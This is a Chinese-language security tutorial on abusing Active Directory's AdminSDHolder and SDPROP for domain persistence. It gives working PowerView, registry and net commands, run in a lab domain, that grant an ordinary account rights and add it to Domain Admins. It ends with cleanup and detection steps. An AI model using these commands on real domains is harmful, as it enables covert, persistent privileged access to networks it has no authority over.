0x00 简介

AdminSDHolder是AD中的一个容器,它维护了一个ACL模板;后台程序SDPROP(Security Descriptor propagator)默认每60分钟执行一次,将受保护账户和组(如Domain Admins组)的ACL重置为AdminSDHolder中的ACL,用于确保这些关键对象的安全权限不被修改。 修改AdminSDHolder ACL需要域管权限,修改的ACL由SDPROP自动应用于所有受保护的AD账户和组,从而实现域权限维持。

参考:

AdminSDHolder, Protected Groups and SDPROP?redirectedfrom=MSDN#id0250006)

Appendix C: Protected Accounts and Groups in Active Directory

域渗透——AdminSDHolder

AD Permissions Attack #3: Persistence using AdminSDHolder and SDProp

Sneaky Active Directory Persistence #15: Leverage AdminSDHolder & SDProp to (Re)Gain Domain Admin Rights

0x01 AdminSDHolder介绍

AdminSDHolder, Protected Groups and SDPROP?redirectedfrom=MSDN#id0250006)

Appendix C: Protected Accounts and Groups in Active Directory

Active Directory Domain Services uses AdminSDHolder, protected groups and Security Descriptor propagator (SD propagator or SDPROP for short) to secure privileged users and groups from unintentional modification. This functionality was introduced in the inaugural release of Active Directory in Windows 2000 Server and it’s fairly well known. However, virtually all IT administrators have been negatively impacted by this functionality, and that will to continue unless they fully understand how AdminSDHolder, protected groups and SDPROP work. Each Active Directory domain has an object called AdminSDHolder, which resides in the System container of the domain. The AdminSDHolder object has a unique Access Control List (ACL), which is used to control the permissions of security principals that are members of built-in privileged Active Directory groups (what I like to call “protected” groups). Every hour, a background process runs on the domain controller that holds the PDC Emulator operations master role. It compares the ACL on all security principals (users, groups and computer accounts) that belong to protected groups against the ACL on the AdminSDHolder object. If the size or the binary string is different, the security descriptor on the object is overwritten by the security descriptor from the AdminSDHolder object.. As you can see, multiple layers of security are incorporated into this functionality. First, the permissions applied to users belonging to protected groups are more stringent than the default permissions applied onto other user accounts. Next, the default behaviour is that inheritance is disabled on these privileged accounts, ensuring that permissions applied at the parent level aren’t inherited by the protected objects, regardless of where they reside. Finally, the background process running every 60 minutes identifies manual modifications to an ACL and overwrites them so that the ACL matches the ACL on the AdminSDHolder object.
AdminSDHolder位于”CN=AdminSDHolder,CN=System”,它维护了一个模板严格定义了受保护账户和组的安全访问权限,同时它的继承属性是disable的。每隔60分钟后台程序SDPROP会将受保护账户和组的ACL与AdminSDHolder中的ACL比较,保证它们是一致的。

【Windows域】AdminSDHolder - 图1

常见的受保护账户和组有:
  • Account Operators
  • Administrator
  • Administrators
  • Backup Operators
  • Domain Admins
  • Domain Controllers
  • Enterprise Admins
  • Krbtgt
  • Print Operators
  • Read-only Domain Controllers
  • Replicator
  • Schema Admins
  • Server Operators
可以在Appendix C: Protected Accounts and Groups in Active Directory查询受保护账户和组详细列表,也可以通过设置将某些账户和组排除出受保护列表。 因此,修改AdminSDHolder的ACL,为普通账户添加Full Control权限,此后由SDPROP推送至受保护组,这样一来,普通账户就有权限添加账户到受保护组等。 这里提一下AdminCount,在Kerberoasting技术中就有查询AdminCount=1的账户,这是因为受保护账户和组会有一个特殊的标记 AdminCount=1。需要注意的一点是,一旦将用户从特权组中删除,他们仍将adminCount值保持为1,但Active Directory不再将其视为受保护的对象。

【Windows域】AdminSDHolder - 图2

0x02 AdminSDHolder利用

1. powerview

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

修改AdminSDHolder ACL

  1. Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=ring2,DC=com" -PrincipalIdentity "win10" -Rights All

【Windows域】AdminSDHolder - 图3

触发SDPROP程序

1) 等待自动执行
默认60分钟一次,可以通过修改此注册表调整间隔时间600秒;但不建议调整,会影响域控性能

reg add hklm\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v AdminSDProtectFrequency /t REG_DWORD /d 600

2) ldp.exe手动触发

Appendix C - Protected Accounts and Groups in Active Directory

【Windows域】AdminSDHolder - 图4

3) powershell命令手动触发

https://raw.githubusercontent.com/edemilliere/ADSI/master/Invoke-ADSDPropagation.ps1

  1. Invoke-ADSDPropagation -TaskName RunProtectAdminGroupsTask -Verbose

权限维持

触发后查看Domain Admins账户的属性,可以看到win10账户有权修改Domain Admins组

【Windows域】AdminSDHolder - 图5

  1. C:\WINDOWS\system32>net groups "domain admins" win10 /domain /add
  2. The request will be processed at a domain controller for domain ring2.com.
  3. The command completed successfully.
  4. C:\WINDOWS\system32>net user win10 /domain
  5. The request will be processed at a domain controller for domain ring2.com.
  6. User name                    win10
  7. Full Name                    win10
  8. Comment
  9. User's comment
  10. Country/region code          000 (System Default)
  11. Account active               Yes
  12. Account expires              Never
  13. Password last set            ‎9/‎3/‎2020 9:49:35 PM
  14. Password expires             Never
  15. Password changeable          ‎9/‎4/‎2020 9:49:35 PM
  16. Password required            Yes
  17. User may change password     Yes
  18. Workstations allowed         All
  19. Logon script
  20. User profile
  21. Home directory
  22. Last logon                   ‎12/‎26/‎2020 6:54:24 PM
  23. Logon hours allowed          All
  24. Local Group Memberships
  25. Global Group memberships     *Domain Admins        *Domain Users
  26. The command completed successfully.
重新登录win10账户后,才能生效

【Windows域】AdminSDHolder - 图6

清理环境

  1. PS C:\Users\Administrator\Desktop> Remove-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=ring2,DC=com" -PrincipalIdentity "win10" -Rights All -Verbose
  2. VERBOSE: [Get-DomainSearcher] search base: LDAP://RINGDC-PC.RING2.COM/DC=RING2,DC=COM
  3. VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
  4. (&(|(|(samAccountName=win10)(name=win10)(displayname=win10))))
  5. VERBOSE: [Get-DomainSearcher] search base: LDAP://RINGDC-PC.RING2.COM/DC=RING2,DC=COM
  6. VERBOSE: [Get-DomainObject] Extracted domain 'ring2.com' from 'CN=AdminSDHolder,CN=System,DC=ring2,DC=com'
  7. VERBOSE: [Get-DomainSearcher] search base: LDAP://RINGDC-PC.RING2.COM/DC=ring2,DC=com
  8. VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
  9. (&(|(distinguishedname=CN=AdminSDHolder,CN=System,DC=ring2,DC=com)))
  10. VERBOSE: [Remove-DomainObjectAcl] Removing principal CN=win10,CN=Users,DC=ring2,DC=com 'All' from
  11. CN=AdminSDHolder,CN=System,DC=ring2,DC=com
  12. VERBOSE: [Remove-DomainObjectAcl] Granting principal CN=win10,CN=Users,DC=ring2,DC=com rights GUID
  13. '00000000-0000-0000-0000-000000000000' on CN=AdminSDHolder,CN=System,DC=ring2,DC=com
  14. True

2. DCShadow+AdminSDHolder

第一种方法要在DC上执行,使用DCShadow+AdminSDHolder结合,能远程操作维持权限。见DCshadow分析文章

0x03 检测

检查AdminSDHolder的ACL,是否有可疑用户 
  1. //powershell
  2. $AdminSDHolder = [adsi]'LDAP://CN=AdminSDHolder,CN=System,DC=ring2,DC=com'
  3. $AdminSDHolder.ObjectSecurity.SDDL | ConvertFrom-SddlString
  4. //powerview
  5. Get-DomainObjectAcl -Identity "CN=AdminSDHolder,CN=System,DC=ring2,DC=com" |Select-Object SecurityIdentifier,ActiveDirector
  6. yRights -Unique

原文

【Windows域】AdminSDHolder